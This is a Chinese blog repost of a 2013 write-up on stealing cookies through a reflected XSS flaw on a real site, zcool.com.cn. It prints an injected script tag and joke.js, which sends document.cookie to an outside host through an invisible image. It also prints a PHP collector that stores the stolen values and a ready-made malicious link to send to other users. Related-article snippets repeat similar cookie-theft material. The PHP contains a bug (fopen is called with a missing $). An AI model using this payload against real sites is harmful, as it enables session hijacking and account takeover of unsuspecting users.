【转】XSS获取cookie的一种手段

最新推荐文章于 2023-05-05 08:47:59 发布
最新推荐文章于 2023-05-05 08:47:59 发布
阅读量308 收藏
点赞数
原文链接:https://www.cnblogs.com/chyingp/archive/2013/06/06/zcool-xss.html
版权

以往只是知道xss是用来弹窗的,但是作为一种危险的漏洞,它到底有什么危害呢,今天我见识了一下,感觉很强,于是在这转载一下。

原文:https://www.cnblogs.com/chyingp/archive/2013/06/06/zcool-xss.html

首先分析了下站酷的页面表现神马的,发现它是将用户输入脚本直接输出到页面,那就好办了,果断输入如下内容:

<script src="http://saintcoder.duapp.com/joke/joke.js"></script>

于是站酷华丽丽地就加载了一段joke.js(只是恶作剧性质的脚本),joke.js里面的代码也很简单,创建一个img标签,将它的src属性指向我预先写好的一个脚本joke.php,这里关键的一点是:将页面的cookie最为参数附加到url后面

var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://saintcoder.duapp.com/joke/joke.php?joke='+encodeURIComponent(document.cookie);

然后呢,joke.php里也是相当简单,解析请求里面的joke参数(即用户的cookie),然后。。。然后偷偷保留起来别有他用~~
复制代码

<?php
    @ini_set('display_errors',1);
    $str = $_GET['joke'];
    $filePath = "joke.php";

    if(is_writable($filePath)==false){
         echo "can't write";
    }else{
          $handler = fopen(filePath, "a");
          fwrite($handler, $str);
          fclose($handler);
    }
?>

复制代码

很好,顿时觉得站酷很危险,只要我把下面这段链接发给其他站酷用户

http://www.zcool.com.cn/tosearch.do?page=0&world=%3Cscript%20src=%22http://saintcoder.duapp.com/joke/joke.js%22%3E%3C/script%3E

毫无压力所有cookie到手,如果当时用户登录中效果更佳 😃

LovelyLucy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用XSS来将cookie传送指定文件中
Q1n6
09-23 847
题目可以说是很直白了,为什么突然写这个,还来源于前几天的面试,今年的校招因为一些公司的缩招,可以说是泥潭之争了,当然了,被面试官蹂躏也是自身水平和能力的限制,没有任何怨言。在面试官让我手写xss利用代码的时候,我才发现,因为一直以来的乙方的惯性思维,在漏洞利用和脚本上自己的实践太少了,但是还好,我还有很长很长的时间,可以努力。 在存在XSS漏洞的输入框中输入(IP地址为测试内网地址): d
网络安全学习第8篇 - xss攻击(java实现反射型xss攻击,发送链接诱骗点击,编写服务端获取客户端的cookie信息)
一清道长的个人博客
05-14 3962
请依据课堂所讲解的关于XSS攻防的技术知识,结合你所学过的Web前端编程技术,自行设计一套XSS攻防流程。要求: 1、攻防技术的实现既要有深度也要有广度。 2、需要设计一个前端页面。 3、提交时请提交实验报告以及Web前端代码。 实验文件.rar (1)什么是xss? 跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS一种经常出...
XSS获取cookie
11-19 183
在你服务器的html目录下创建joke文件夹; 在joke文件夹中创建joke.js 和joke.php joke.js 创建img标签,将它的src属性指向另一个脚本joke.php,这里关键的一点是:将页面的cookie作为参数附加到url后面 joke.js代码如下: var img = document.createElement('img'); img.wi...
XSSCookie
公众号shadow sock7
12-03 925
payload: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS injection#exploit-code-or-poc XSS/grabber.php &amp;amp;amp;lt;?php // How to use it echo &amp;amp;quot; &amp;amp;amp;lt;script&amp;amp;amp;gt;new Image().src=\&amp
XSS实现cookie盗取
一期一会的博客
04-08 1053
XSS实现cookie盗取 在一台win7上搭建xss,另外一台搭建留言板(一个网站),两台虚拟机之间能够ping通,在留言板上留言,管理员回复留言,xss获取cookie,利用中国菜刀通过获取cookie用管理员账号登录。 实验环境: ​ Windows 7 192.168.1.128 (搭建xss) ​ Windows 7 192.168.1.100 (安装小旋风) xss平台搭建好以后,进入管理员账户,复制邀请码,退出登录,利用邀请码重新注册一个test11的账户
XSS平台打cookie实战
m0_74989372的博客
05-05 469
xss平台的使用及xss漏洞的利用
Web应用安全:XSS盗取cookiepayload(实验习题).docx
06-17
XSS 盗取 Cookie一种常见的 XSS 攻击方式,攻击者通过在网站上注入恶意脚本,获取用户的 Cookie,从而以用户的身份访问网站。 XSS 盗取 Cookie 的流程 1. 攻击者将可以获取并发送管理员的 Cookie 的恶意 XSS ...
xss获取cookie攻击
最新发布
07-28
回答: XSS(跨站脚本攻击)是一种攻击方式,其目的是获取用户的敏感信息,如cookie。常见的XSS攻击手段包括盗用cookie、利用植入Flash获取更高权限、以用户身份执行管理动作等。\[2\]在XSS攻击中,攻击者通过在网页...
XSS的高级利用:盗取用户Cookie
Zeker62的博客
08-13 1180
XSS不仅仅弹出一个alert就行了,更多的是和其他玩意组合 高级的利用有: 盗取用户Cookie 修改网页内容 网站挂马 利用网站重定向 XSS蠕虫 XSS会话劫持 XSS会话劫持和Cookie有关 Cookie简介: Cookie一种能够让网站服务器把少量文本数据存储到客户端的硬盘或者内存中,或者是从客户端的硬盘或者内存读取数据的一种技术 因为HTTP协议是无状态的,Web服务器没办法区分请求是否来源于同一个浏览器,因此,web服务器需要额外的数据去维持会话,而Cookie正是这种维持会话的数
浅显易懂的cookie的使用(设置和获取cookie缓存)
01-20
总结,Cookie是Web应用程序常用的一种存储和管理用户状态的手段。了解如何正确设置和获取Cookie对于前端开发者来说至关重要,特别是在处理登录状态、个性化设置等方面。在实际应用中,还需考虑跨域问题、存储策略...
漏洞篇(XSS 跨站脚本攻击一)
m0_58001548的博客
04-08 2904
1、Cookie 概述:Cookie 是一些数据, 存储于你电脑上的文本文件中。当 web 服务器向浏览器发送 web 页面时,在连接关闭后,服务端不会记录用户的信息。Cookie 的作用就是用于解决 "如何记录客户端的用户信息":(1)、当用户访问 web 页面时,他的名字可以记录在 cookie 中。2)、在用户下一次访问该页面时,可以在 cookie 中读取用户访问记录。Cookie 以键值对形式存储,如下所示:
88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]
qwsn
01-25 4101
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss漏洞测试-加载payload的方法 1、背景 2、xss平台通用payload加载 3、img 创建script标签加载 4、字符并接加载 5、jquery加载
简单的利用XSS获取用户cookie
shy的博客
10-25 4321
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
3-5通过XSS获取cookie以及XSS后台管理系统的使用
山兔的博客
04-23 3904
XSS漏洞测试:cookie获取和钓鱼攻击演示  XSS漏洞测试:cookie的窃取和利用 同时讲到get型xss的利用,post型xss的利用  XSS漏洞测试:钓鱼攻击  XSS漏洞测试:xss获取用户键盘记录 让大家更好的理解xss的危害以及原理 案例1:xss如何获取cookie? GET型XSS利用:cookie获取 pkxss管理后台使用介绍 在源码包里面,有一个pkxss,我们可以把这个目录,单独的放在某个目录下面,这个东西其实是一个可以独立使用的后台,我们可以单独的把他放在站点目录下
利用XSS漏洞轻松拿到登录用户的cookie
weixin_34277853的博客
06-06 2652
前言 最近在逛小程序,其中发现一个小程序是申请用户信息后自动在某站注册账号。 于是便去网站看了下,WOW!好多输入框~就顺手试了下xss。 找到XSS漏洞 本着学习交流的目的,用颤巍巍的手指在用户名称的输入框里输下了如下代码: <script>alert(1)</script> emm...没反应,内心一阵失落,并没有预期中那样弹出个框来,叹了口气。 但是,好歹是个程序...
全网首发 最佳实践 实现img标签发访问需要权限的资源的最佳实践 src访问需要权限的资源 全网首发 可实现一切资源访问(附代码)Springboot
CC学java
08-24 1119
实现img标签发访问需要权限的资源概述问题原理流程实现controllerserviceimplutil 概述 在对接三方服务中,有诸多接口访问资源是需要权限的,比如图片视频此类的,那么前端就无法直接用img等标签来直接展示了,那么本文章的就是提供一种后代发访问资源来实现页面标签直接访问的。 问题 在对接三方服务中,比如我这次业务是对接的上上签(https://www.bestsign.cn/)服务,那么其中其提供的查询合同详情接口会返回片段例如"highQualityPreviewUrl": "/co
最简单的反射型XSScookie
thislocal的博客
03-29 1万+
参考了网上的一堆教程和余弦的《web前端黑客技术揭秘》 主要是关于XSS的。更准确一点,关于盗取cookie的,且是反射型。其实就是最简单的一个反射型cookie盗取过程。 一、XSS的一般过程: 1、找到XSS漏洞,假设存在于网站A; 2、发送可以触发该漏洞的,特定代码到攻击目标; 可以这样构造:凤姐最新性感视频 其中,www.foo.com/xss/xss.php?x=是存在漏洞
利用XSS获取cookie
热门推荐
littlecjx
11-04 2万+
如果web应用在用户输入的地方没有过滤特殊字符,比如<, >, ', ", <script>, javascript 等字符,而且在变量输出的地方没有使用安全的编码函数,比如PHP的htmlentities()和htmlspecialchars()函数,JavaScript中的escapeJavascript函数,这样的web应用极易出现XSS漏洞XSS攻击的危害主要有盗取用户cookie、跳
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值